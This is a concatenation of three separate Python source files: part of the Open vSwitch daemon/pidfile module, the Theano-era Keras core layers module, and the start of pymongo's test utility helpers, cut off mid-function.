                    vlog.warn("%s, waiting until 10 seconds since last "
                              "restart" % status_msg)
                    while True:
                        now = ovs.timeval.msec()
                        wakeup = last_restart + 10000
                        if now > wakeup:
                            break
                        print("sleep %f" % ((wakeup - now) / 1000.0))
                        time.sleep((wakeup - now) / 1000.0)
                last_restart = ovs.timeval.msec()
                vlog.err("%s, restarting" % status_msg)
                daemon_pid = _fork_and_wait_for_startup()
                if not daemon_pid:
                    # We are the newly forked daemon: hand control back.
                    break
            else:
                vlog.info("%s, exiting" % status_msg)
                sys.exit(0)
# Running in new daemon process.
def _close_standard_fds():
    """Redirect stdin, stdout and stderr to /dev/null so a detached
    daemon does not artificially hold open the session (e.g. SSH) that
    started it."""
    null_fd = ovs.socket_util.get_null_fd()
    if null_fd >= 0:
        for std_fd in (0, 1, 2):
            os.dup2(null_fd, std_fd)
def daemonize_start():
    """If daemonization is configured, then starts daemonization, by forking
    and returning in the child process.  The parent process hangs around
    until the child lets it know either that it completed startup
    successfully (by calling daemonize_complete()) or that it failed to
    start up (by exiting with a nonzero exit code)."""
    if _detach:
        if _fork_and_wait_for_startup() > 0:
            # Running in parent process.
            sys.exit(0)
        # Running in daemon or monitor process.
    if _monitor:
        # Keep the original pipe fd so the monitor (not the daemon) can
        # release the grandparent once the daemon has started.
        saved_daemonize_fd = _daemonize_fd
        daemon_pid = _fork_and_wait_for_startup()
        if daemon_pid > 0:
            # Running in monitor process.
            _fork_notify_startup(saved_daemonize_fd)
            _close_standard_fds()
            _monitor_daemon(daemon_pid)
        # Running in daemon process
    if _pidfile:
        _make_pidfile()
def daemonize_complete():
    """If daemonization is configured, then this function notifies the parent
    process that the child process has completed startup successfully.

    When detaching, it also starts a new session, changes directory to "/"
    (unless disabled with set_no_chdir()), and redirects the standard file
    descriptors to /dev/null."""
    _fork_notify_startup(_daemonize_fd)
    if _detach:
        os.setsid()
        if _chdir:
            os.chdir("/")
        _close_standard_fds()
def usage():
    """Print a summary of the daemon-related command-line options."""
    sys.stdout.write("""
Daemon options:
--detach run in background as daemon
--no-chdir do not chdir to '/'
--pidfile[=FILE] create pidfile (default: %s/%s.pid)
--overwrite-pidfile with --pidfile, start even if already running
""" % (ovs.dirs.RUNDIR, ovs.util.PROGRAM_NAME))
def __read_pidfile(pidfile, delete_if_stale):
    """Reads a pid from 'pidfile'.

    Returns:
      > 0: the pid of the live process holding 'pidfile' locked (possibly
           our own process -- see below);
        0: 'delete_if_stale' was true and the pidfile was missing or
           stale (a stale pidfile is deleted);
      < 0: a negative errno value describing the failure."""
    if _pidfile_dev is not None:
        try:
            s = os.stat(pidfile)
            if s.st_ino == _pidfile_ino and s.st_dev == _pidfile_dev:
                # It's our own pidfile. We can't afford to open it,
                # because closing *any* fd for a file that a process
                # has locked also releases all the locks on that file.
                #
                # Fortunately, we know the associated pid anyhow.
                return os.getpid()
        except OSError:
            pass
    try:
        file_handle = open(pidfile, "r+")
    except IOError as e:
        if e.errno == errno.ENOENT and delete_if_stale:
            # No pidfile means no daemon: nothing to do.
            return 0
        vlog.warn("%s: open: %s" % (pidfile, e.strerror))
        return -e.errno
    # Python fcntl doesn't directly support F_GETLK so we have to just try
    # to lock it.
    try:
        fcntl.lockf(file_handle, fcntl.LOCK_EX | fcntl.LOCK_NB)
        # pidfile exists but wasn't locked by anyone.  Now we have the lock.
        if not delete_if_stale:
            file_handle.close()
            vlog.warn("%s: pid file is stale" % pidfile)
            return -errno.ESRCH
        # Is the file we have locked still named 'pidfile'?
        try:
            raced = False
            s = os.stat(pidfile)
            s2 = os.fstat(file_handle.fileno())
            if s.st_ino != s2.st_ino or s.st_dev != s2.st_dev:
                raced = True
        except IOError:
            raced = True
        if raced:
            vlog.warn("%s: lost race to delete pidfile" % pidfile)
            return -errno.EALREADY
        # We won the right to delete the stale pidfile.
        try:
            os.unlink(pidfile)
        except IOError as e:
            vlog.warn("%s: failed to delete stale pidfile (%s)"
                      % (pidfile, e.strerror))
            return -e.errno
        else:
            vlog.dbg("%s: deleted stale pidfile" % pidfile)
            file_handle.close()
            return 0
    except IOError as e:
        if e.errno not in [errno.EACCES, errno.EAGAIN]:
            vlog.warn("%s: fcntl: %s" % (pidfile, e.strerror))
            return -e.errno
        # Someone else has the pidfile locked, so it is live: read its pid.
        try:
            try:
                error = int(file_handle.readline())
            except IOError as e:
                vlog.warn("%s: read: %s" % (pidfile, e.strerror))
                error = -e.errno
            except ValueError:
                vlog.warn("%s does not contain a pid" % pidfile)
                error = -errno.EINVAL
            return error
        finally:
            try:
                file_handle.close()
            except IOError:
                pass
def read_pidfile(pidfile):
    """Read the PID recorded in 'pidfile'.

    Returns the positive PID on success, otherwise a negative errno
    value.  Never deletes a stale pidfile."""
    return __read_pidfile(pidfile, False)
def _check_already_running():
    """Terminates the program when the configured pidfile shows that the
    daemon is already running, or when the pidfile check itself failed."""
    pid = __read_pidfile(_pidfile, True)
    if pid > 0:
        _fatal("%s: already running as pid %d, aborting" % (_pidfile, pid))
    elif pid < 0:
        # __read_pidfile() returns a *negative* errno value on failure, so
        # negate it before formatting: os.strerror() rejects negatives.
        _fatal("%s: pidfile check failed (%s), aborting"
               % (_pidfile, os.strerror(-pid)))
def add_args(parser):
    """Add the daemon module's command-line options to 'parser', an
    argparse.ArgumentParser, under a "Daemon Options" group."""
    default_pidfile = make_pidfile_name(None)
    group = parser.add_argument_group(title="Daemon Options")
    group.add_argument("--detach", action="store_true",
                       help="Run in background as a daemon.")
    group.add_argument("--no-chdir", action="store_true",
                       help="Do not chdir to '/'.")
    group.add_argument("--monitor", action="store_true",
                       help="Monitor %s process." % ovs.util.PROGRAM_NAME)
    group.add_argument("--pidfile", nargs="?", const=default_pidfile,
                       help="Create pidfile (default %s)." % default_pidfile)
    group.add_argument("--overwrite-pidfile", action="store_true",
                       help="With --pidfile, start even if already running.")
def handle_args(args):
    """Apply daemon-module settings from 'args', the object produced by
    parse_args() on an ArgumentParser prepared with add_args()."""
    # Boolean flags map directly onto module-level setters; the setters
    # each touch independent state, so application order does not matter.
    flag_handlers = ((args.detach, set_detach),
                     (args.no_chdir, set_no_chdir),
                     (args.overwrite_pidfile, ignore_existing_pidfile),
                     (args.monitor, set_monitor))
    for enabled, handler in flag_handlers:
        if enabled:
            handler()
    if args.pidfile:
        set_pidfile(args.pidfile)
| |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division
import theano
import theano.tensor as T
import numpy as np
from .. import activations, initializations, regularizers, constraints
from ..utils.theano_utils import shared_zeros, floatX
from ..utils.generic_utils import make_tuple
from ..regularizers import ActivityRegularizer, Regularizer
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from six.moves import zip
class Layer(object):
    '''Abstract base class for all layers.

    Tracks trainable parameters, the connection to the previous layer,
    and provides weight (de)serialization and naming helpers.'''
    def __init__(self):
        self.params = []
        self.name = None

    def init_updates(self):
        # Reset the list of state updates applied during training.
        self.updates = []

    def set_previous(self, layer, connection_map={}):
        '''Connect this layer's input to `layer`'s output.'''
        assert self.nb_input == layer.nb_output == 1, "Cannot connect layers: input count and output count should be 1."
        if not self.supports_masked_input() and layer.get_output_mask() is not None:
            raise Exception("Cannot connect non-masking layer to layer with masked output")
        self.previous = layer

    @property
    def nb_input(self):
        return 1

    @property
    def nb_output(self):
        return 1

    def get_output(self, train=False):
        # Identity by default; concrete layers override this.
        return self.get_input(train)

    def get_input(self, train=False):
        if hasattr(self, 'previous'):
            return self.previous.get_output(train=train)
        else:
            return self.input

    def supports_masked_input(self):
        ''' Whether or not this layer respects the output mask of its previous layer in its calculations. If you try
        to attach a layer that does *not* support masked_input to a layer that gives a non-None output_mask() that is
        an error'''
        return False

    def get_output_mask(self, train=None):
        '''
        For some models (such as RNNs) you want a way of being able to mark some output data-points as
        "masked", so they are not used in future calculations. In such a model, get_output_mask() should return a mask
        of one less dimension than get_output() (so if get_output is (nb_samples, nb_timesteps, nb_dimensions), then the mask
        is (nb_samples, nb_timesteps), with a one for every unmasked datapoint, and a zero for every masked one.

        If there is *no* masking then it shall return None. For instance if you attach an Activation layer (they support masking)
        to a layer with an output_mask, then that Activation shall also have an output_mask. If you attach it to a layer with no
        such mask, then the Activation's get_output_mask shall return None.

        Some layers have an output_mask even if their input is unmasked, notably Embedding which can turn the entry "0" into
        a mask.
        '''
        return None

    def set_weights(self, weights):
        '''Set parameter values from a list of numpy arrays (shape-checked).'''
        for p, w in zip(self.params, weights):
            if p.eval().shape != w.shape:
                raise Exception("Layer shape %s not compatible with weight shape %s." % (p.eval().shape, w.shape))
            p.set_value(floatX(w))

    def get_weights(self):
        '''Return the current parameter values as a list of numpy arrays.'''
        weights = []
        for p in self.params:
            weights.append(p.get_value())
        return weights

    def get_config(self):
        return {"name": self.__class__.__name__}

    def get_params(self):
        '''Return (params, regularizers, constraints, updates) for training.'''
        consts = []
        updates = []
        if hasattr(self, 'regularizers'):
            regularizers = self.regularizers
        else:
            regularizers = []
        if hasattr(self, 'constraints') and len(self.constraints) == len(self.params):
            # One constraint per parameter; identity where unspecified.
            for c in self.constraints:
                if c:
                    consts.append(c)
                else:
                    consts.append(constraints.identity())
        elif hasattr(self, 'constraint') and self.constraint:
            # A single constraint shared by every parameter.
            consts += [self.constraint for _ in range(len(self.params))]
        else:
            consts += [constraints.identity() for _ in range(len(self.params))]
        if hasattr(self, 'updates') and self.updates:
            updates += self.updates
        return self.params, regularizers, consts, updates

    def set_name(self, name=None):
        '''Name the layer (default: class name) and prefix parameter names.'''
        if name is None:
            name = self.__class__.__name__
        if self.name is not None:
            # if already set, we only need to replace the prefix
            # NOTE(review): self.name itself is not updated here, so a
            # second rename would strip a stale prefix length -- confirm.
            old_name_len = len(self.name)
            for p in self.params:
                p.name = name + p.name[old_name_len:]
        else:  # first time we set the layer name
            self.name = name
            # we set all parameter names
            for i, p in enumerate(self.params):
                if p.name is None:
                    # Bug fix: test the parameter's *name* for None.  The
                    # old code tested `p is None` (and would then have
                    # crashed dereferencing p.name), so unnamed params got
                    # the bogus name '<name>_None' instead of '<name>_p<i>'.
                    p.name = '%s_p%d' % (name, i)
                else:
                    p.name = '%s_%s' % (name, p.name)
        return
class MaskedLayer(Layer):
    '''Base class for layers that pass their input mask straight through.

    Subclass this (instead of Layer) when the layer's computation leaves
    the timestep mask unchanged; remember to actually honor the input
    mask inside get_output().
    '''
    def supports_masked_input(self):
        return True

    def get_input_mask(self, train=False):
        previous = getattr(self, 'previous', None)
        if previous is None:
            return None
        return previous.get_output_mask(train)

    def get_output_mask(self, train=False):
        '''By default the output mask is the input mask, unchanged.
        Override this when the layer reshapes its input.'''
        return self.get_input_mask(train)
class Masking(MaskedLayer):
    """Mask an input sequence by using a mask value to identify padding.
    This layer copies the input to the output layer with identified padding
    replaced with 0s and creates an output mask in the process.
    At each timestep, if the values all equal `mask_value`,
    then the corresponding mask value for the timestep is 0 (skipped),
    otherwise it is 1.
    """
    def __init__(self, mask_value=0.):
        super(Masking, self).__init__()
        self.mask_value = mask_value
        # 3D input expected: (nb_samples, timesteps, input_dim).
        self.input = T.tensor3()
    def get_output_mask(self, train=False):
        # 1 for timesteps where any entry differs from mask_value, else 0.
        X = self.get_input(train)
        return T.any(T.ones_like(X) * (1. - T.eq(X, self.mask_value)), axis=-1)
    def get_output(self, train=False):
        # Zero out fully-masked timesteps; all others pass through.
        X = self.get_input(train)
        return X * T.shape_padright(T.any((1. - T.eq(X, self.mask_value)), axis=-1))
    def get_config(self):
        return {"name": self.__class__.__name__,
                "mask_value": self.mask_value}
class Merge(Layer):
    def __init__(self, layers, mode='sum', concat_axis=-1):
        ''' Merge the output of a list of layers or containers into a single tensor.
            mode: {'sum', 'mul', 'concat'}
            concat_axis: axis to concatenate along (used only for 'concat').
        '''
        if len(layers) < 2:
            raise Exception("Please specify two or more input layers (or containers) to merge")
        self.mode = mode
        self.concat_axis = concat_axis
        self.layers = layers
        # Pool the trainable state of all merged layers, de-duplicating
        # parameters shared between them.
        self.params = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
        for l in self.layers:
            params, regs, consts, updates = l.get_params()
            self.regularizers += regs
            self.updates += updates
            # params and constraints have the same size
            for p, c in zip(params, consts):
                if p not in self.params:
                    self.params.append(p)
                    self.constraints.append(c)
    def get_params(self):
        return self.params, self.regularizers, self.constraints, self.updates
    def get_output(self, train=False):
        # Combine the merged layers' outputs according to self.mode.
        if self.mode == 'sum':
            s = self.layers[0].get_output(train)
            for i in range(1, len(self.layers)):
                s += self.layers[i].get_output(train)
            return s
        elif self.mode == 'concat':
            inputs = [self.layers[i].get_output(train) for i in range(len(self.layers))]
            return T.concatenate(inputs, axis=self.concat_axis)
        elif self.mode == 'mul':
            s = self.layers[0].get_output(train)
            for i in range(1, len(self.layers)):
                s *= self.layers[i].get_output(train)
            return s
        else:
            raise Exception('Unknown merge mode')
    def get_input(self, train=False):
        # Union of the merged layers' inputs, without duplicates.
        res = []
        for i in range(len(self.layers)):
            o = self.layers[i].get_input(train)
            if not type(o) == list:
                o = [o]
            for output in o:
                if output not in res:
                    res.append(output)
        return res
    @property
    def input(self):
        return self.get_input()
    def supports_masked_input(self):
        return False
    def get_output_mask(self, train=None):
        # Mask merging is not supported: the merged output is unmasked.
        return None
    def get_weights(self):
        weights = []
        for l in self.layers:
            weights += l.get_weights()
        return weights
    def set_weights(self, weights):
        # Give each layer its slice of the flat weight list, in order.
        for i in range(len(self.layers)):
            nb_param = len(self.layers[i].params)
            self.layers[i].set_weights(weights[:nb_param])
            weights = weights[nb_param:]
    def get_config(self):
        return {"name": self.__class__.__name__,
                "layers": [l.get_config() for l in self.layers],
                "mode": self.mode,
                "concat_axis": self.concat_axis}
class Dropout(MaskedLayer):
    '''
        Hinton's dropout: during training, zero each unit with probability
        p; at test time, scale activations by (1 - p) to compensate
        (classic "uninverted" dropout).
    '''
    def __init__(self, p):
        # p: fraction of input units to drop.
        super(Dropout, self).__init__()
        self.p = p
        # NOTE(review): 10e6 is 1e7; presumably just a seed range — confirm
        # the intended magnitude.
        self.srng = RandomStreams(seed=np.random.randint(10e6))
    def get_output(self, train=False):
        X = self.get_input(train)
        if self.p > 0.:
            retain_prob = 1. - self.p
            if train:
                # Sample a binary keep-mask; each unit kept with prob 1 - p.
                X *= self.srng.binomial(X.shape, p=retain_prob, dtype=theano.config.floatX)
            else:
                # Test time: scale down by the expected keep fraction.
                X *= retain_prob
        return X
    def get_config(self):
        return {"name": self.__class__.__name__,
                "p": self.p}
class Activation(MaskedLayer):
    '''
        Apply an element-wise activation function to the incoming tensor.

        target/beta are stored and serialized in get_config() but are not
        used by get_output() in this class.
    '''
    def __init__(self, activation, target=0, beta=0.1):
        super(Activation, self).__init__()
        self.activation = activations.get(activation)
        self.target = target
        self.beta = beta

    def get_output(self, train=False):
        return self.activation(self.get_input(train))

    def get_config(self):
        return {"name": self.__class__.__name__,
                "activation": self.activation.__name__,
                "target": self.target,
                "beta": self.beta}
class Reshape(Layer):
    '''
        Reshape the incoming tensor to (nb_samples,) + dims.

        Can't be used as the first layer in a model (no fixed input!).
        The first dimension is assumed to be nb_samples and is preserved.
    '''
    def __init__(self, *dims):
        super(Reshape, self).__init__()
        self.dims = dims

    def get_output(self, train=False):
        X = self.get_input(train)
        new_shape = make_tuple(X.shape[0], *self.dims)
        return theano.tensor.reshape(X, new_shape)

    def get_config(self):
        return {"name": self.__class__.__name__,
                "dims": self.dims}
class Permute(Layer):
    '''
        Permute the dimensions of the data according to the given tuple.

        `dims` is expected to be a permutation of the non-sample axes
        (the sample axis 0 always stays first).
    '''
    def __init__(self, dims):
        super(Permute, self).__init__()
        self.dims = dims

    def get_output(self, train=False):
        # `train=False` default added for consistency with every other
        # layer's get_output() signature (backward compatible: positional
        # and keyword callers behave exactly as before).
        X = self.get_input(train)
        return X.dimshuffle((0,) + self.dims)

    def get_config(self):
        return {"name": self.__class__.__name__,
                "dims": self.dims}
class Flatten(Layer):
    '''
        Collapse every non-sample dimension into one:
        (nb_samples, d1, d2, ...) -> (nb_samples, d1*d2*...).
    '''
    def __init__(self):
        super(Flatten, self).__init__()

    def get_output(self, train=False):
        X = self.get_input(train)
        flat_size = theano.tensor.prod(X.shape) // X.shape[0]
        return theano.tensor.reshape(X, (X.shape[0], flat_size))
class RepeatVector(Layer):
    '''
        Repeat the input vector n times:
        (nb_samples, dim) -> (nb_samples, n, dim).
    '''
    def __init__(self, n):
        super(RepeatVector, self).__init__()
        self.n = n

    def get_output(self, train=False):
        X = self.get_input(train)
        # Stack n copies along a new leading axis, then move the sample
        # axis back to the front.
        stacked = theano.tensor.stack(*([X] * self.n))
        return stacked.dimshuffle((1, 0, 2))

    def get_config(self):
        return {"name": self.__class__.__name__,
                "n": self.n}
class Dense(Layer):
    '''
        Just your regular fully connected NN layer:
        output = activation(dot(input, W) + b).
    '''
    def __init__(self, input_dim, output_dim, init='glorot_uniform', activation='linear', weights=None, name=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None):
        super(Dense, self).__init__()
        self.init = initializations.get(init)
        self.activation = activations.get(activation)
        self.input_dim = input_dim
        self.output_dim = output_dim
        # 2D input expected: (nb_samples, input_dim).
        self.input = T.matrix()
        self.W = self.init((self.input_dim, self.output_dim), name='W')
        self.b = shared_zeros((self.output_dim), name='b')
        self.params = [self.W, self.b]
        # Only regularizers that were actually supplied are collected.
        self.regularizers = []
        self.W_regularizer = regularizers.get(W_regularizer)
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        # Constraints are positional: one per entry of self.params.
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        self.constraints = [self.W_constraint, self.b_constraint]
        if weights is not None:
            self.set_weights(weights)
        if name is not None:
            self.set_name(name)
    def set_name(self, name):
        self.W.name = '%s_W' % name
        self.b.name = '%s_b' % name
    def get_output(self, train=False):
        X = self.get_input(train)
        output = self.activation(T.dot(X, self.W) + self.b)
        return output
    def get_config(self):
        return {"name": self.__class__.__name__,
                "input_dim": self.input_dim,
                "output_dim": self.output_dim,
                "init": self.init.__name__,
                "activation": self.activation.__name__,
                "W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
                "b_regularizer": self.b_regularizer.get_config() if self.b_regularizer else None,
                "activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
                "W_constraint": self.W_constraint.get_config() if self.W_constraint else None,
                "b_constraint": self.b_constraint.get_config() if self.b_constraint else None}
class ActivityRegularization(Layer):
    '''
        Identity layer whose only effect is to add an activity-based
        penalty (L1 and/or L2) to the model's cost function.
    '''
    def __init__(self, l1=0., l2=0.):
        super(ActivityRegularization, self).__init__()
        self.l1 = l1
        self.l2 = l2
        regularizer = ActivityRegularizer(l1=l1, l2=l2)
        regularizer.set_layer(self)
        self.regularizers = [regularizer]

    def get_output(self, train=False):
        # Pure pass-through; the regularizer hooks into the cost separately.
        return self.get_input(train)

    def get_config(self):
        return {"name": self.__class__.__name__,
                "l1": self.l1,
                "l2": self.l2}
class TimeDistributedDense(MaskedLayer):
    '''
       Apply a same DenseLayer for each dimension[1] (shared_dimension) input
       Especially useful after a recurrent network with 'return_sequence=True'
       Tensor input dimensions:  (nb_sample, shared_dimension, input_dim)
       Tensor output dimensions: (nb_sample, shared_dimension, output_dim)
    '''
    def __init__(self, input_dim, output_dim, init='glorot_uniform', activation='linear', weights=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None):
        super(TimeDistributedDense, self).__init__()
        self.init = initializations.get(init)
        self.activation = activations.get(activation)
        self.input_dim = input_dim
        self.output_dim = output_dim
        # 3D input expected: (nb_samples, timesteps, input_dim).
        self.input = T.tensor3()
        self.W = self.init((self.input_dim, self.output_dim))
        self.b = shared_zeros((self.output_dim))
        self.params = [self.W, self.b]
        # Only regularizers that were actually supplied are collected.
        self.regularizers = []
        self.W_regularizer = regularizers.get(W_regularizer)
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        # Constraints are positional: one per entry of self.params.
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        self.constraints = [self.W_constraint, self.b_constraint]
        if weights is not None:
            self.set_weights(weights)
    def get_output(self, train=False):
        X = self.get_input(train)
        # Move time to the front, apply the shared dense transform to each
        # timestep, then restore (nb_samples, timesteps, output_dim).
        output = self.activation(T.dot(X.dimshuffle(1, 0, 2), self.W) + self.b)
        return output.dimshuffle(1, 0, 2)
    def get_config(self):
        return {"name": self.__class__.__name__,
                "input_dim": self.input_dim,
                "output_dim": self.output_dim,
                "init": self.init.__name__,
                "activation": self.activation.__name__,
                "W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
                "b_regularizer": self.b_regularizer.get_config() if self.b_regularizer else None,
                "activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
                "W_constraint": self.W_constraint.get_config() if self.W_constraint else None,
                "b_constraint": self.b_constraint.get_config() if self.b_constraint else None}
class AutoEncoder(Layer):
    '''
        A customizable autoencoder model.
        If output_reconstruction then dim(input) = dim(output)
        else dim(output) = dim(hidden)
    '''
    def __init__(self, encoder, decoder, output_reconstruction=True, weights=None):
        super(AutoEncoder, self).__init__()
        self.output_reconstruction = output_reconstruction
        self.encoder = encoder
        self.decoder = decoder
        # Chain: input -> encoder -> decoder.
        self.decoder.set_previous(self.encoder)
        # Pool both sub-layers' trainable state, de-duplicating any
        # parameters shared between encoder and decoder (tied weights).
        self.params = []
        self.regularizers = []
        self.constraints = []
        self.updates = []
        for layer in [self.encoder, self.decoder]:
            params, regularizers, constraints, updates = layer.get_params()
            self.regularizers += regularizers
            self.updates += updates
            for p, c in zip(params, constraints):
                if p not in self.params:
                    self.params.append(p)
                    self.constraints.append(c)
        if weights is not None:
            self.set_weights(weights)
    def set_previous(self, node):
        # Upstream layers feed the encoder.
        self.encoder.set_previous(node)
    def get_weights(self):
        weights = []
        for layer in [self.encoder, self.decoder]:
            weights += layer.get_weights()
        return weights
    def set_weights(self, weights):
        # Flat list order: encoder weights first, then decoder weights.
        nb_param = len(self.encoder.params)
        self.encoder.set_weights(weights[:nb_param])
        self.decoder.set_weights(weights[nb_param:])
    def get_input(self, train=False):
        return self.encoder.get_input(train)
    @property
    def input(self):
        return self.encoder.input
    def _get_hidden(self, train=False):
        # The bottleneck (code) representation.
        return self.encoder.get_output(train)
    def get_output(self, train=False):
        # At test time, optionally expose only the hidden representation.
        if not train and not self.output_reconstruction:
            return self.encoder.get_output(train)
        return self.decoder.get_output(train)
    def get_config(self):
        return {"name": self.__class__.__name__,
                "encoder_config": self.encoder.get_config(),
                "decoder_config": self.decoder.get_config(),
                "output_reconstruction": self.output_reconstruction}
class MaxoutDense(Layer):
    '''
        Max-out layer, nb_feature is the number of pieces in the piecewise linear approx.
        Refer to http://arxiv.org/pdf/1302.4389.pdf
    '''
    def __init__(self, input_dim, output_dim, nb_feature=4, init='glorot_uniform', weights=None,
                 W_regularizer=None, b_regularizer=None, activity_regularizer=None,
                 W_constraint=None, b_constraint=None):
        super(MaxoutDense, self).__init__()
        self.init = initializations.get(init)
        self.input_dim = input_dim
        self.output_dim = output_dim
        self.nb_feature = nb_feature
        # 2D input expected: (nb_samples, input_dim).
        self.input = T.matrix()
        # One weight matrix / bias vector per linear piece.
        self.W = self.init((self.nb_feature, self.input_dim, self.output_dim))
        self.b = shared_zeros((self.nb_feature, self.output_dim))
        self.params = [self.W, self.b]
        # Only regularizers that were actually supplied are collected.
        self.regularizers = []
        self.W_regularizer = regularizers.get(W_regularizer)
        if self.W_regularizer:
            self.W_regularizer.set_param(self.W)
            self.regularizers.append(self.W_regularizer)
        self.b_regularizer = regularizers.get(b_regularizer)
        if self.b_regularizer:
            self.b_regularizer.set_param(self.b)
            self.regularizers.append(self.b_regularizer)
        self.activity_regularizer = regularizers.get(activity_regularizer)
        if self.activity_regularizer:
            self.activity_regularizer.set_layer(self)
            self.regularizers.append(self.activity_regularizer)
        # Constraints are positional: one per entry of self.params.
        self.W_constraint = constraints.get(W_constraint)
        self.b_constraint = constraints.get(b_constraint)
        self.constraints = [self.W_constraint, self.b_constraint]
        if weights is not None:
            self.set_weights(weights)
    def get_output(self, train=False):
        X = self.get_input(train)
        # -- don't need activation since it's just linear.
        # Max over the piece axis (axis=1 of the dot result) implements
        # the maxout unit.
        output = T.max(T.dot(X, self.W) + self.b, axis=1)
        return output
    def get_config(self):
        return {"name": self.__class__.__name__,
                "input_dim": self.input_dim,
                "output_dim": self.output_dim,
                "init": self.init.__name__,
                "nb_feature": self.nb_feature,
                "W_regularizer": self.W_regularizer.get_config() if self.W_regularizer else None,
                "b_regularizer": self.b_regularizer.get_config() if self.b_regularizer else None,
                "activity_regularizer": self.activity_regularizer.get_config() if self.activity_regularizer else None,
                "W_constraint": self.W_constraint.get_config() if self.W_constraint else None,
                "b_constraint": self.b_constraint.get_config() if self.b_constraint else None}
| |
# Copyright 2012-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for testing pymongo
"""
import contextlib
import os
import struct
import sys
import threading
import time
import warnings
from functools import partial
from pymongo import MongoClient
from pymongo.errors import AutoReconnect, OperationFailure
from pymongo.server_selectors import (any_server_selector,
writable_server_selector)
from pymongo.write_concern import WriteConcern
from test import (client_context,
db_user,
db_pwd,
host,
port)
from test.version import Version
def _connection_string_noauth(h, p):
    """Build a credential-free URI for host 'h' and port 'p'.

    An 'h' that is already a mongodb:// URI is returned unchanged."""
    return h if h.startswith("mongodb://") else "mongodb://%s:%d" % (h, p)
def _connection_string(h, p):
    """Like _connection_string_noauth(), but embeds the db_user/db_pwd
    test credentials when the deployment has auth enabled."""
    if h.startswith("mongodb://"):
        return h
    if client_context.auth_enabled:
        return "mongodb://%s:%s@%s:%d" % (db_user, db_pwd, h, p)
    return _connection_string_noauth(h, p)
def single_client_noauth(h=host, p=port, **kwargs):
    """Make a direct connection. Don't authenticate."""
    uri = _connection_string_noauth(h, p)
    return MongoClient(uri, **kwargs)
def single_client(h=host, p=port, **kwargs):
    """Make a direct connection, and authenticate if necessary."""
    uri = _connection_string(h, p)
    return MongoClient(uri, **kwargs)
def rs_client_noauth(h=host, p=port, **kwargs):
    """Connect to the replica set. Don't authenticate."""
    uri = _connection_string_noauth(h, p)
    return MongoClient(uri, replicaSet=client_context.replica_set_name,
                       **kwargs)
def rs_client(h=host, p=port, **kwargs):
    """Connect to the replica set and authenticate if necessary."""
    uri = _connection_string(h, p)
    return MongoClient(uri, replicaSet=client_context.replica_set_name,
                       **kwargs)
def rs_or_single_client_noauth(h=host, p=port, **kwargs):
    """Connect to the replica set if there is one, otherwise the standalone.

    Like rs_or_single_client, but does not authenticate.
    """
    if client_context.replica_set_name:
        factory = rs_client_noauth
    else:
        factory = single_client_noauth
    return factory(h, p, **kwargs)
def rs_or_single_client(h=host, p=port, **kwargs):
    """Connect to the replica set if there is one, otherwise the standalone.

    Authenticates if necessary.
    """
    factory = (rs_client if client_context.replica_set_name
               else single_client)
    return factory(h, p, **kwargs)
def one(s):
    """Return an arbitrary single element of iterable *s*.

    Raises StopIteration when *s* is empty, like ``next(iter(s))``.
    """
    for element in s:
        return element
    raise StopIteration
def oid_generated_on_client(oid):
    """Return True if this process's PID is embedded in *oid*.

    Client-generated ObjectIds carry ``os.getpid() % 0xFFFF`` as a
    big-endian unsigned short at byte offset 7 of the 12-byte value.
    """
    (embedded_pid,) = struct.unpack(">H", oid.binary[7:9])
    our_pid = os.getpid() % 0xFFFF
    return our_pid == embedded_pid
def delay(sec):
    """Return JavaScript for a $where clause that sleeps *sec* seconds."""
    return "function() {{ sleep({0:f} * 1000); return true; }}".format(sec)
def get_command_line(client):
    """Fetch the server's startup options via getCmdLineOpts.

    Asserts the command succeeded and returns the full reply document.
    """
    reply = client.admin.command('getCmdLineOpts')
    assert reply['ok'] == 1, "getCmdLineOpts() failed"
    return reply
def server_started_with_option(client, cmdline_opt, config_opt):
    """Check if the server was started with a particular option.

    :Parameters:
      - `cmdline_opt`: The command line option (i.e. --nojournal)
      - `config_opt`: The config file option (i.e. nojournal)
    """
    opts = get_command_line(client)
    # Prefer the parsed config when the option appears there.
    if 'parsed' in opts and config_opt in opts['parsed']:
        return opts['parsed'][config_opt]
    # Otherwise fall back to scanning the raw argv.
    return cmdline_opt in opts['argv']
def server_started_with_auth(client):
    """Return True if the server requires authentication.

    A permission failure on getCmdLineOpts itself already proves auth is
    on; otherwise the parsed config is inspected (2.6+ ``security``
    section, then the 2.0+ top level), falling back to scanning argv.
    """
    try:
        command_line = get_command_line(client)
    except OperationFailure as e:
        msg = e.details.get('errmsg', '')
